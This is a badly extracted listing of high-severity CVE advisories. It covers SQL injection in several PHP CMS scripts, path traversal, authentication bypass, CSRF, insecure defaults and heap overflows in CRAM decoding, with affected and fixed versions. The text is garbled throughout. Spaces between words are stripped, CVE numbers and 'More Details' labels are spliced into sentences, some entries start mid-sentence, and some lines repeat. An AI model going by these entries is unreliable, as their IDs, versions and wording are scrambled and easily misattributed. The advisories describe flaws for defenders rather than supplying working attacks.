user-controlledvaluesfrom.key()and.at()directlyintosingle-quotedJSONpathstringliterals('$.key')CVE- More withoutescapingsinglequotes.AnattackercanbreakoutoftheJSONpathstringcontextandinjectarbitrarySQL. 8.2 Details ThisisinconsistentwithsanitizeIdentifier(),whichproperlydoublesdelimitercharactersforidentifiers—both32763 arenon-parameterizableSQLconstructsrequiringmanualescaping,butonlyidentifiersareprotected.Version 0.28.12fixestheissue. 0.28.12fixestheissue. KeplerWallpaperScript1.1containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoCVE- executearbitrarySQLqueriesbyinjectingmaliciouscodeintothecategoryparameter.AttackerscansendGET More 8.2 requeststothecategoryendpointwithURL-encodedSQLUNIONstatementstoextractdatabaseinformation Details25576 includingusernames,databasenames,andMySQLversiondetails. ZeewaysJobsiteCMScontainsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstomanipulateCVE- databasequeriesbyinjectingSQLcodethroughthe'id'GETparameter.Attackerscansendcraftedrequeststo More2019- 8.2 newsdetails.php,jobsdetails.php,orjobcmpdetails.phpwithmalicious'id'valuesusingGROUPBYandCASE Details25636 statementstoextractsensitivedatabaseinformation. ownDMS4.7containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheIMGparameter.AttackerscansendGETrequeststo More2019- 8.2 pdfstream.php,imagestream.php,oranyfilestream.phpwithcraftedSQLpayloadsintheIMGparametertoextract Details25580 sensitivedatabaseinformationincludingversionanddatabasenames. SimplePressCMS1.0.7containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecuteCVE- arbitrarySQLqueriesbyinjectingmaliciouscodethroughthe'p'and's'parameters.AttackerscansendGET More2019- 8.2 requestswithcraftedSQLpayloadstoextractsensitivedatabaseinformationincludingusernames,database Details25575 names,andversiondetails. TheKiviCare–Clinic&PatientManagementSystem(EHR)pluginforWordPressisvulnerabletoPrivilegeCVE- Escalationduetomissingauthorizationonthe/wp-json/kivicare/v1/setup-wizard/clinicRESTAPIendpointinall More2026- 8.2 versionsupto,andincluding,4.1.2.Thismakesitpossibleforunauthenticatedattackerstocreateanewclinic Details2992 andaWordPressuserwithclinicadminprivileges. HeimdallisacloudnativeIdentityAwareProxyandAccessControlDecisionservice.WhenusingHeimdallin envoygRPCdecisionAPImodewithversions0.7.0-alphathrough0.17.10,wrongencodingofthequeryURLstring allowsruleswithnon-wildcardpathexpressionstobebypassed.EnvoysplitstherequestedURLintoparts,and sendsthepartsindividuallytoHeimdall.AlthoughqueryandpatharepresentintheAPI,thequeryfieldis CVE- documentedtobealwaysemptyandtheURLqueryisincludedinthepathfield.Theimplementationusesgo'surl More2026- librarytoreconstructtheurlwhichautomaticallyencodesspecialcharactersinthepath.Asaconsequence,a 8.2 Details32811 parameterlike/mypath?foo=bartoPathisescapedinto/mypath%3Ffoo=bar.Subsequently,arulematching /mypathnolongermatchesandisbypassed.TheissuecanonlyleadtounintendedaccessifHeimdallis configuredwithan"allowall"defaultrule.Sincev0.16.0,Heimdallenforcessecuredefaultsandrefusestostart withsuchaconfigurationunlessthisenforcementisexplicitlydisabled,e.g.via--insecure-skip-secure-default-rule- enforcementorthebroader--insecureflag.Thisissuehasbeenfixedinversion0.17.11. FileRiseisaself-hostedwebfilemanager/WebDAVserver.Inversionspriorto3.9.0,ahardcodeddefault encryptionkey(defaultpleasechangethiskey)isusedforallcryptographicoperations—HMACtoken CVE- generation,AESconfigencryption,andsessiontokens—allowinganyunauthenticatedattackertoforgeupload More2026- tokensforarbitraryfileuploadtosharedfolders,andtodecryptadminconfigurationsecretsincludingOIDCclient 8.2 Details33072 secretsandSMTPpasswords.FileRiseusesasinglekey(PERSISTENTTOKENSKEY)forallcryptooperations.The defaultvaluedefaultpleasechangethiskeyishardcodedintwoplacesandusedunlessthedeployerexplicitly overridestheenvironmentvariable.Thisissueisfixedinversion3.9.0. MatrimonyWebsiteScriptM-PluscontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticated CVE- attackerstomanipulatedatabasequeriesbyinjectingSQLcodethroughvariousPOSTparameters.Attackerscan More2019- injectmaliciousSQLpayloadsintoparametersliketxtGender,religion,Fage,andcboCountryacross 8.2 Details25639 simplesearchresults.php,advsearchresults.php,specialcaseresults.php,locationalresults.php,and registration2.phptoextractsensitivedatabaseinformationorexecutearbitrarySQLcommands. OpenClawversionspriorto2026.2.19containapathtraversalvulnerabilityintheFeishumediadownloadflowCVE- whereuntrustedmediakeysareinterpolateddirectlyintotemporaryfilepathsinextensions/feishu/src/media.ts. More2026- 8.2 AnattackerwhocancontrolFeishumediakeyvaluesreturnedtotheclientcanusetraversalsegmentstoescape Details22171 os.tmpdir()andwritearbitraryfileswithintheOpenClawprocesspermissions. CVE- BufferOverflowvulnerabilityingiflibv.5.2.2allowsaremoteattackertocauseadenialofserviceviathe More2026- 8.2 EGifGCBToExtensionoverwritinganexistingGraphicControlExtensionblockwithoutvalidatingitsallocatedsize. Details26740 WhenapluginisinstalledusingtheArturiaSoftwareCenter(MacOS),italsoinstallsanuninstall.shbashscriptinaCVE- rootownedpath.Thisscriptiswrittentodiskwiththefilepermissions777,meaningitiswritablebyanyuser. More2026- 8.2 WhenuninstallingapluginviatheArturiaSoftwareCenterthePrivilegedHelpergetsinstructedtoexecutethis Details24063 script.Whenthebashscriptismanipulatedbyanattackerthisscenariowillleadtoprivilegeescalation. InoutArticleBaseCMScontainsSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstomanipulateCVE- databasequeriesthroughthe'p'and'u'parameters.AttackerscaninjectSQLcodeusingXOR-basedpayloadsin More2019- 8.2 GETrequeststoportalLogin.phptoextractsensitivedatabaseinformationorcausedenialofservicethroughtime- Details25640 basedattacks. BootstrapyCMScontainsmultipleSQLinjectionvulnerabilitiesthatallowunauthenticatedattackerstoexecute CVE- arbitrarySQLqueriesbyinjectingmaliciouscodethroughPOSTparameters.AttackerscaninjectSQLpayloads More intothethread_idparameterofforum-thread.php,thesubjectparameterofcontact-submit.php,thepost-id 8.2 Details 25642 parameterofpost-new-submit.php,andthethread-idparametertoextractsensitivedatabaseinformationor 25642 parameterofpost-new-submit.php,andthethread-idparametertoextractsensitivedatabaseinformationor causedenialofservice. i-doitCMDB1.12containsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoexecutearbitraryCVE- SQLqueriesbyinjectingmaliciouscodethroughtheobjGroupIDparameter.AttackerscansendGETrequestswith More 8.2 craftedSQLpayloadsintheobjGroupIDparametertoextractsensitivedatabaseinformationincludingusernames, Details25581 databasenames,andversiondetails. bareboxisabootloader.Inbareboxfromversion2016.03.0tobeforeversion2025.09.3andfromversion 2025.10.0tobeforeversion2026.03.1,whencreatingaFIT,mkimage(1)setsthehashed-nodespropertyoftheCVE- FITsignaturenodetolistwhichnodesoftheFITwerehashedaspartofthesigningprocessasthesewillneedto More2026- 8.2 beverifiedlateronbythebootloader.However,hashed-nodesitselfisnotpartofthehashandcanthereforebe Details33243 modifiedbyanattackertotrickthebootloaderintobootingdifferentimagesthanthosethathavebeenverified. Thisissuehasbeenpatchedinbareboxversions2025.09.3and2026.03.1.
DNAsequencealignmentdata.Inthecram_decode_slice()functioncalledwhilereadingCRAMrecords, CVE-validationofthereferenceidfieldoccurredtoolate,allowingtwooutofboundsreadstooccurbeforetheinvalid More2026-datawasdetected.Thebugdoesallowtwovaluestobeleakedtothecaller,howeverasthefunctionreportsan 8.2 Details31965erroritmaybedifficulttoexploitthem.Itisalsopossiblethattheprogramwillcrashduetotryingtoaccess invalidmemory.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthis issue. NetartmediaVlogSystemcontainsanSQLinjectionvulnerabilitythatallowsunauthenticatedattackerstoCVE-manipulatedatabasequeriesbyinjectingSQLcodethroughtheemailparameter.AttackerscansendPOST More2019- 8.2requeststoindex.phpwithmaliciousemailvaluesintheforgottenpasswordmoduletoextractsensitivedatabase Details25641information. SpringBootapplicationswithActuatorcanbevulnerabletoan"AuthenticationBypass"vulnerabilitywhenan CVE-applicationendpointthatrequiresauthenticationisdeclaredunderaspecificpath,alreadyconfiguredforaHealth More2026-Groupadditionalpath.ThisissueaffectsSpringBoot:from4.0before4.0.3,from3.5before3.5.11,from3.4 8.2 Details22731before3.4.15.ThisCVEissimilarbutnotequivalenttoCVE-2026-22733,astheconditionsforexploitand vulnerableversionsaredifferent. NGINXOpenSourceandNGINXPlushaveavulnerabilityinthengxhttpdavmodulemodulethatmightallowan attackertotriggerabufferoverflowtotheNGINXworkerprocess;thisvulnerabilitymayresultinterminationof CVE-theNGINXworkerprocessormodificationofsourceordestinationfilenamesoutsidethedocumentroot.This More2026-issueaffectsNGINXOpenSourceandNGINXPluswhentheconfigurationfileusesDAVmoduleMOVEorCOPY 8.2 Details27654methods,prefixlocation(nonregularexpressionlocationconfiguration),andaliasdirectives.Theintegrityimpact isconstrainedbecausetheNGINXworkerprocessuserhaslowprivilegesanddoesnothaveaccesstotheentire system.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)arenotevaluated. CVE- More2026- 8.1vulnerabilityinOvathemeTripgoallowsPHPLocalFileInclusion.ThisissueaffectsTripgo:fromn/abefore1.5.6. Details27093 CVE- More2026-versionsonthe2.xseriesuptoandincluding2.41.0,animproperauthorizationissueintheMyPageprofile 8.1 Details32300updatefeaturemayallowmodificationofarbitraryuserinformation.Versions1.41.1and2.41.1containapatch. FileRiseisaself-hostedwebfilemanager/WebDAVserver.Fromversion1.0.1tobeforeversion3.10.0,the CVE-resumableIdentifierparameterintheResumable.jschunkeduploadhandler(UploadModel::handleUpload())is More2026-concatenateddirectlyintofilesystempathswithoutanysanitization.Anauthenticateduserwithupload 8.1 Details33329permissioncanexploitthistowritefilestoarbitrarydirectoriesontheserver,deletearbitrarydirectoriesviathe post-assemblycleanup,andprobefile/directoryexistence.Thisissuehasbeenpatchedinversion3.10.0. CVE-DeserializationofUntrustedDatavulnerabilityinBuddhaThemesColorFolio-FreelanceDesignerWordPress More2026-ThemeallowsObjectInjection.ThisissueaffectsColorFolio-FreelanceDesignerWordPressTheme:fromn/a 8.1 Details27096through1.3. AvulnerabilitywasidentifiedinYiTechnologyYIHomeCamera22.1.120171024151200.Thisimpactsan CVE-unknownfunctionofthefilehome/web/ipcofthecomponentHTTPFirmwareUpdateHandler.Themanipulation More2026-leadstoimproperverificationofcryptographicsignature.Theattackispossibletobecarriedoutremotely.The 8.1 Details4478complexityofanattackisratherhigh.Theexploitabilityissaidtobedifficult.Theexploitispubliclyavailableand mightbeused.Thevendorwascontactedearlyaboutthisdisclosurebutdidnotrespondinanyway. CVE-AuthenticationBypassUsinganAlternatePathorChannelvulnerabilityinThemepasteAdminSafetyGuardallows More 2026- 8.1PasswordRecoveryExploitation.ThisissueaffectsAdminSafetyGuard:fromn/athrough1.2.6. Details 25471 WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,theremindMe.json.php endpointpasses`$REQUEST['livescheduleid']throughmultiplefunctionswithoutsanitizationuntilitreaches CVE-Schedulercommands::getAllActiveOrToRepeat(),whichdirectlyconcatenatesitintoaSQLLIKEclause. MoreAlthoughintermediatefunctions(newLiveschedule(),getUsers_idOrCompany())applyintval()internally, 8.1 33651theydosoonlocalcopieswithinObjectYPT::getFromDb()`,leavingtheoriginaltaintedvariableunchanged.Any Details authenticatedusercanperformtime-basedblindSQLinjectiontoextractarbitrarydatabasecontents.Commit authenticatedusercanperformtime-basedblindSQLinjectiontoextractarbitrarydatabasecontents.Commit 75d45780728294ededa1e3f842f95295d3e7d144containsapatch.
CVE- to8.0.0.2,themoduleACLfunctionAclMain::zhAclCheck()onlychecksforthepresenceofany"allow"(useror More group).Itneverchecksforexplicit"deny"(allowed=0).Asaresult,administratorscannotrevokeaccessbysetting 8.1 Details33302 auserorgroupto"deny";iftheuserisinagroupthathas"allow,"accessisgrantedregardlessofexplicitdenies. Version8.0.0.2fixestheissue.
CVE- to8.0.0.2,userswiththeNotes-myencountersrolecanfillEyeExamformsinpatientencounters.Theanswers More2026- totheformcanbeprintedoutinPDFform.AnarbitraryfilereadvulnerabilitywasidentifiedinthePDFcreation 8.1 Details33301 functionwheretheformanswersareparsedasunescapedHTML,allowinganattackertoincludearbitraryimage filesfromtheserverinthegeneratedPDF.Version8.0.0.2fixestheissue.
sanitizeFFmpegCommand()functioninplugin/API/standAlone/functions.phpisdesignedtopreventOS CVE-commandinjectioninffmpegcommandsbystrippingdangerousshellmetacharacters(&&,;,|,`,<, More2026->).However,itfailstostrip$()(bashcommandsubstitutionsyntax).Sincethesanitizedcommandis 8.1 Details33482executedinsideadouble-quotedsh-ccontextinexecAsync(),anattackerwhocancraftavalidencrypted payloadcanachievearbitrarycommandexecutiononthestandaloneencoderserver.Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1containsapatch. CVE- More2026-vulnerabilityinThemeREXMelaniaallowsPHPLocalFileInclusion.ThisissueaffectsMelania:fromn/athrough 8.1 Details223242.5.0. CVE-PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelowcontaina More2026-heapuse-after-freevulnerabilityintheICEsessionthatoccurswhenthereareraceconditionsbetweensession 8.1 Details32942destructionandthecallbacks.Thisissuehasbeenfixedinversion2.17. DataEaseisanopensourcedatavisualizationanalysistool.Versions2.10.19andbelowhaveinconsistentLocale handlingbetweentheJDBCURLvalidationlogicandtheH2JDBCengine'sinternalparsing.DataEaseuses String.toUpperCase()withoutspecifyinganexplicitLocale,causingitssecuritycheckstorelyontheJVM'sdefault CVE-runtimelocale,whileH2JDBCalwaysnormalizesURLsusingLocale.ENGLISH.InTurkishlocaleenvironments More2026-(tr_TR),Javaconvertsthelowercaseletteritoİ(dottedcapitalI)insteadofthestandardI,soamalicious 8.1 Details32939parameterlikeiNITbecomesİNITinDataEase'sfilter(bypassingitsblacklist)whileH2stillcorrectlyinterpretsitas INIT.ThisdiscrepancyallowsattackerstosmuggledangerousJDBCparameterspastDataEase'ssecurity validation,andtheissuehasbeenconfirmedasexploitableinrealDataEasedeploymentscenariosrunningunder affectedregionalsettings.Theissuehasbeenfixedinversion2.10.20.
plugin/Permissions/setPermission.json.phpendpointacceptsGETparametersforastate-changingoperationthatCVE-modifiesusergrouppermissions.TheendpointhasnoCSRFtokenvalidation,andtheapplicationexplicitlysets More2026- 8.1session.cookie_samesite=Noneonsessioncookies.Thisallowsanunauthenticatedattackertocraftapagewith Details33649`
`tagsthat,whenvisitedbyanadmin,silentlygrantarbitrarypermissionstotheattacker'susergroup— escalatingtheattackertonear-adminaccess.Asoftimeofpublication,noknownpatchedversionsareavailable.
researchanddevelopmentinNaturalLanguageProcessing.Inversions3.9.3andprior,theNLTKdownloaderdoesCVE-notvalidatethesubdirandidattributeswhenprocessingremoteXMLindexfiles.Attackerscancontrola More2026- 8.1remoteXMLindexservertoprovidemaliciousvaluescontainingpathtraversalsequences(suchas../),which Details33236canleadtoarbitrarydirectorycreation,arbitraryfilecreation,andarbitraryfileoverwrite.Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8apatchestheissue. Daguisaworkflowenginewithabuilt-inWebuserinterface.Fromversion2.0.0tobeforeversion2.3.1,thefixfor CVE-CVE-2026-27598addedValidateDAGNametoCreateNewDAGandrewrotegenerateFilePathtousefilepath.Base. More2026-ThispatchedtheCREATEpath.TheremainingAPIendpoints-GET,DELETE,RENAME,EXECUTE-allpassthe 8.1 Details33344{fileName}URLpathparametertolocateDAGwithoutcallingValidateDAGName.%2F-encodedforwardslashesin the{fileName}segmenttraverseoutsidetheDAGsdirectory.Thisissuehasbeenpatchedinversion2.3.1. MuraCMSthrough10.1.10containsaCSRFvulnerabilitythatallowsattackerstopermanentlydestroyalldeleted contentstoredinthetrashsystemthroughasimpleCSRFattack.ThevulnerablecTrash.emptyfunctionlacks CSRFtokenvalidation,enablingmaliciouswebsitestoforgerequeststhatirreversiblydeletealltrashedcontentCVE- Morewhenanauthenticatedadministratorvisitsacratedwebpage.SuccessfulexploitationoftheCSRFvulnerability2025- 8.1 DetailsresultsinpotentiallycatastrophicdatalosswithintheMuraCMSsystem.Whenanauthenticatedadministrator55046 visitsamaliciouspagecontainingtheCSRFexploit,theirbrowserautomaticallysubmitsahiddenformthat permanentlyemptiestheentiretrashsystemwithoutanyvalidation,confirmationdialog,oruserconsent. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,thedeleteDumpparameterin CVE-plugin/CloneSite/cloneServer.json.phpispasseddirectlytounlink()withoutanypathsanitization.Anattacker Morewithvalidclonecredentialscanusepathtraversalsequences(e.g.,../../)todeletearbitraryfilesontheserver, 8.1 Details33293includingcriticalapplicationfilessuchasconfiguration.php,causingcompletedenialofserviceorenabling furtherattacksbyremovingsecurity-criticalfiles.Version26.0fixestheissue.
WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,theofficialDockerdeploymentfiles (docker-compose.yml,env.example)shipwiththeadminpasswordsetto"password",whichisautomaticallyused toseedtheadminaccountduringinstallation,meaninganyinstancedeployedwithoutoverriding SYSTEMADMINPASSWORDisimmediatelyvulnerabletotrivialadministrativetakeover.NocompensatingCVE-controlsexist:thereisnoforcedpasswordchangeonfirstlogin,nocomplexityvalidation,nodefault-password More 8.1detection,andthepasswordishashedwithweakMD5.Fulladminaccessenablesuserdataexposure,content Details33037manipulation,andpotentialremotecodeexecutionviafileuploadsandpluginmanagement.Thesameinsecure- defaultpatternextendstodatabasecredentials(avideo/avideo),compoundingtherisk.Exploitationdependson operatorsfailingtochangethedefault,aconditionlikelymetinquick-start,demo,andautomateddeployments. Thisissuehasbeenfixedinversion26.0. WWBNAVideoisanopensourcevideoplatform.Inversions25.0andbelow,/objects/phpsessionid.json.phpCVE-exposesthecurrentPHPsessionIDtoanyunauthenticatedrequest.TheallowOrigin()functionreflectsanyOrigin More2026- 8.1headerbackinAccess-Control-Allow-OriginwithAccess-Control-Allow-Credentials:true,enablingcross-origin Details33043sessiontheftandfullaccounttakeover.Thisissuehasbeenfixedinversion26.0. FileBrowserisafilemanaginginterfaceforuploading,deleting,previewing,renaming,andeditingfileswithina specifieddirectory.Inversions2.61.2andbelow,theTUSresumableuploadhandlerparsestheUpload-Length headerasasigned64-bitintegerwithoutvalidatingthatthevalueisnon-negative,allowinganauthenticateduser tosupplyanegativevaluethatinstantlysatisfiestheuploadcompletionconditionuponthefirstPATCHrequest. Thiscausestheservertofireafter_uploadexechookswithemptyorpartialfiles,enablinganattackertoCVE-repeatedlytriggeranyconfiguredhookwitharbitraryfilenamesandzerobyteswritten.Theimpactrangesfrom More2026- 8.1DoSthroughexpensiveprocessinghooks,tocommandinjectionamplificationwhencombinedwithmalicious Details32759filenames,toabuseofupload-drivenworkflowslikeS3ingestionordatabaseinserts.Evenwithoutexechooks enabled,thenegativeUpload-Lengthcreatesinconsistentcacheentrieswherefilesaremarkedcompletebut containnodata.AlldeploymentsusingtheTUSuploadendpoint(/api/tus)areaffected,withtheenableExecflag escalatingtheimpactfromcacheinconsistencytoremotecommandexecution.Atthetimeofpublication,no patchormitigationwasavailabletoaddressthisissue. Checkmateisanopen-source,self-hostedtooldesignedtotrackandmonitorserverhardware,uptime,response times,andincidentsinreal-timewithbeautifulvisualizations.Inversionsfrom3.5.1andprior,amassassignmentCVE-vulnerabilityinCheckmate'suserprofileupdateendpointallowsanyauthenticatedusertoescalatetheir More2026- 8.1privilegestosuperadmin,bypassingallrole-basedaccesscontrols.Anattackercanmodifytheiruserroletogain Details31836completeadministrativeaccesstotheapplication,includingtheabilitytoviewallusers,modifycritical configurations,andaccesssensitivesystemdata.Attimeofpublication,therearenopubliclyavailablepatches. tar-rsisatararchivereading/writinglibraryforRust.Versions0.4.44andbelowhaveconditionallogicthatskips thePAXsizeheaderincaseswherethebaseheadersizeisnonzero.AspartofCVE-2025-62518,theastral-tokio- tarprojectwaschangedtocorrectlyhonorPAXsizeheadersinthecasewhereitwasdifferentfromthebaseCVE-header.Thisisalmosttheinverseoftheastral-tokio-tarissue.Anydiscrepancyinhowtarparsershonorfilesize More2026- 8.1canbeusedtocreatearchivesthatappeardifferentlywhenunpackedbydifferentarchivers.Inthiscase,thetar- Details33055rs(Rusttar)crateisanoutlierincheckingfortheheadersize-othertarparsers(includinge.g.Goarchive/tar) unconditionallyusethePAXsizeoverride.Thiscanaffectanythingthatusesthetarcratetoparsearchivesand expectstohaveaconsistentviewwithotherparsers.Thisissuehasbeenfixedinversion0.4.45. WWBNAVideoisanopensourcevideoplatform.Versions25.0andbelowarevulnerabletounauthenticated applicationtakeoverthroughtheinstall/checkConfiguration.phpendpoint.install/checkConfiguration.phpperformsCVE-fullapplicationinitialization:databasesetup,adminaccountcreation,andconfigurationfilewrite,allfroman More2026- 8.1unauthenticatedPOSTinput.Theonlyguardischeckingwhethervideos/configuration.phpalreadyexists.On Details33038uninitializeddeployments,anyremoteattackercancompletetheinstallationwithattacker-controlledcredentials andanattacker-controlleddatabase,gainingfulladministrativeaccess.Thisissuehasbeenfixedinversion26.0. CVE-Priortoversions7.15.1and8.9.3,theSuiteCRMRESTAPIV8hasmissingACL(AccessControlList)checkson More2026- 8.1severalendpoints,allowingauthenticateduserstoaccessandmanipulatedatatheyshouldnothavepermission Details29189tointeractwith.Versions7.15.1and8.9.3patchtheissue.
DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whenreadingdata encodedusingtheBYTE_ARRAY_LENmethod,thecram_byte_array_len_decode()failedtovalidatethatthe amountofdatabeingunpackedmatchedthesizeoftheoutputbufferwhereitwastobestored.DependingonCVE-thedataseriesbeingread,thiscouldresulteitherinaheaporastackoverflowwithattacker-controlledbytes. More2026- 8.1Dependingonthedatastreamthiscouldresulteitherinaheapbufferoverfloworastackoverflow.Ifauser Details31971opensafilecraftedtoexploitthisissueitcouldleadtotheprogramcrashing,overwritingofdatastructureson theheaporstackinwaysnotexpectedbytheprogram,orchangingthecontrolflowoftheprogram.Itmaybe possibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthis issue.Thereisnoworkaroundforthisissue. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.0,aflawinVikunja’s passwordresetlogicallowsdisableduserstoregainaccesstotheiraccounts.TheResetPassword()functionsetsCVE-theuser’sstatustoStatusActiveafterasuccessfulpasswordresetwithoutverifyingwhethertheaccountwas More 8.1previouslydisabled.Byrequestingaresettokenthrough/api/v1/user/password/tokenandcompletingthereset Details33316 via/api/v1/user/password/reset,adisabledusercanreactivatetheiraccountandbypassadministrator-imposed accountdisablement.Version2.2.0patchestheissue. accountdisablement.Version2.2.0patchestheissue. Stirling-PDFisalocallyhostedwebapplicationthatperformsvariousoperationsonPDFfiles.Inversionspriorto CVE-2.5.2,the/api/v1/convert/markdown/pdfendpointextractsuser-suppliedZIPentrieswithoutpathchecks.Any Moreauthenticatedusercanwritefilesoutsidetheintendedtemporaryworkingdirectory,leadingtoarbitraryfilewrite 8.1 Details27625withtheprivilegesoftheStirling-PDFprocessuser(stirlingpdfuser).Thiscanoverwritewritablefilesand compromisedataintegrity,withfurtherimpactdependingonwritablepaths.Theissuewasfixedinversion2.5.2. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.1, TaskAttachment.ReadOne()queriesattachmentsbyIDonly(WHEREid=?),ignoringthetaskIDfromtheURL CVE-path.ThepermissioncheckinCanRead()validatesaccesstothetaskspecifiedintheURL,butReadOne() More2026-loadsadifferentattachmentthatmaybelongtoataskinanotherproject.Thisallowsanyauthenticateduserto 8.1 Details33678downloadordeleteanyattachmentinthesystembyprovidingtheirownaccessibletaskIDwithatarget attachmentID.AttachmentIDsaresequentialintegers,makingenumerationtrivial.Version2.2.1patchesthe issue.
DNAsequencealignmentdata.Asonemethodofremovingredundantdata,CRAMusesreference-based compressionsothatinsteadofstoringthefullsequenceforeachalignmentrecorditstoresalocationinan externalreferencesequencealongwithalistofdifferencestothereferenceatthatlocationasasequenceofCVE-"features".Whendecodingthesefeatures,anout-by-oneerrorinatestforCRAMfeaturesthatappearbeyondthe More2026- 8.1extentoftheCRAMrecordsequencecouldresultinaninvalidwriteofoneattacker-controlledbytebeyondthe Details31963endofaheapbuffer.Exploitingthisbugcausesaheapbufferoverflow.Ifauseropensafilecraftedtoexploitthis issue,itcouldleadtotheprogramcrashing,oroverwritingofdataandheapstructuresinwaysnotexpectedby theprogram.Itmaybepossibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1 includefixesforthisissue.Thereisnoworkaroundforthisissue. ApostropheCMSisanopen-sourcecontentmanagementframework.Priortoversion4.28.0,thebearertoken authenticationmiddlewarein@apostrophecms/express/index.js(lines386-389)containsanincorrectMongoDBCVE-querythatallowsincompletelogintokens—wherethepasswordwasverifiedbutTOTP/MFArequirementswere More2026- 8.1NOT—tobeusedasfullyauthenticatedbearertokens.Thiscompletelybypassesmulti-factorauthenticationfor Details32730anyApostropheCMSdeploymentusing@apostrophecms/login-totporanycustomafterPasswordVerifiedlogin requirement.Version4.28.0fixestheissue. pyLoadisafreeandopen-sourcedownloadmanagerwritteninPython.Versionsbefore0.5.0b3.dev97are CVE-vulnerabletopathtraversalduringpasswordverificationofcertainencrypted7zarchives(encryptedfileswith More2026-non-encryptedheaders),causingarbitraryfiledeletionoutsideoftheextractiondirectory.Duringpassword 8.1 Details32808verification,pyLoadderivesanarchiveentrynamefrom7zlistingoutputandtreatsitasafilesystempathwithout constrainingittotheextractiondirectory.Thisissuehasbeenfixedinversion0.5.0b3.dev97. CVE-ImpropercertificatevalidationinthePAMpropagationWinRMconnectionsallowsanetworkattackertoperforma More2026- 8.1man-in-the-middleattackviadisabledTLScertificateverification. Details4434 AflawwasfoundinKeycloak.AremoteattackercouldbypasssecuritycontrolsbysendingavalidSAMLresponseCVE-fromanexternalIdentityProvider(IdP)totheKeycloakSAMLendpointforIdP-initiatedbrokerlogins.Thisallows More2026- 8.1theattackertocompletebrokerloginsevenwhentheSAMLIdentityProviderisdisabled,leadingtounauthorized Details2603authentication.
DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.FortheVARINTand CONSTencodings,incompletevalidationofthecontextinwhichtheencodingswereusedcouldresultinupto eightbytesbeingwrittenbeyondtheendofaheapallocation,oruptoeightbytesbeingwrittentothelocationofCVE-aonebytevariableonthestack,possiblycausingthevaluestoadjacentvariablestochangeunexpectedly. More2026- 8.1Dependingonthedatastreamthiscouldresulteitherinaheapbufferoverfloworastackoverflow.Ifauser Details31968opensafilecraftedtoexploitthisissueitcouldleadtotheprogramcrashing,overwritingofdatastructureson theheaporstackinwaysnotexpectedbytheprogram,orchangingthecontrolflowoftheprogram.Itmaybe possibletousethistoobtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthis issue.Thereisnoworkaroundforthisissue.
DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whenreadingdata encodedusingtheBYTE_ARRAY_STOPmethod,anout-by-oneerrorinthe CVE-cram_byte_array_stop_decode_char()functioncheckforafulloutputbuffercouldresultinasingleattacker- More2026-controlledbytebeingwrittenbeyondtheendofaheapallocation.Exploitingthisbugcausesaheapbuffer 8.1 Details31969overflow.Ifauseropensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,oroverwritingof dataandheapstructuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethistoobtainarbitrary codeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthis issue. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priortoversion4.5.2,inCentralBrowsermode, GlancesstoresboththeZeroconf-advertisedservernameandthediscoveredIPaddressfordynamicservers,but laterbuildsconnectionURIsfromtheuntrustedadvertisednameinsteadofthediscoveredIP.Whenadynamic serverreportsitselfasprotected,Glancesalsousesthatsameuntrustednameasthelookupkeyforsaved MoreCVE- 8.1passwordsandtheglobal[passwords]defaultcredential.Anattackeronthesamelocalnetworkcanadvertisea Details passwordsandtheglobal[passwords]defaultcredential.Anattackeronthesamelocalnetworkcanadvertisea Details fakeGlancesserviceoverZeroconfandcausethebrowsertoautomaticallysendareusableGlances32634 authenticationsecrettoanattacker-controlledhost.ThisaffectsthebackgroundpollingpathandtheREST/WebUI click-throughpathinCentralBrowsermode.Version4.5.2fixestheissue. jsPDFisalibrarytogeneratePDFsinJavaScript.Priortoversion4.2.1,usercontrolofargumentsofthe createAnnotationmethodallowsuserstoinjectarbitraryPDFobjects,suchasJavaScriptactions.IfgiventheCVE-possibilitytopassunsanitizedinputtothefollowingmethod,ausercaninjectarbitraryPDFobjects,suchas More2026- 8.1JavaScriptactions,whichmighttriggerwhenthePDFisopenedorinteractedwiththecreateAnnotation:color Details31898parameter.ThevulnerabilityhasbeenfixedinjsPDF@4.2.1.Asaworkaround,sanitizeuserinputbeforepassingit tothevulnerableAPImembers. mcp-memory-serviceisanopen-sourcememorybackendformulti-agentsystems.Priortoversion10.25.1,when theHTTPserverisenabled(MCPHTTPENABLED=true),theapplicationconfiguresFastAPI'sCORSMiddlewarewith CVE-alloworigins=['*'],allowcredentials=True,allowmethods=["*"],andallowheaders=[""].ThewildcardAccess- More2026-Control-Allow-Origin:headerpermitsanywebsitetoreadAPIresponsescross-origin.Whencombinedwith 8.1 Details33010anonymousaccess(MCPALLOWANONYMOUS_ACCESS=true)-thesimplestwaytogettheHTTPdashboard workingwithoutOAuth-nocredentialsareneeded,soanymaliciouswebsitecansilentlyread,modify,anddelete allstoredmemories.Thisissuehasbeenpatchedinversion10.25.1.
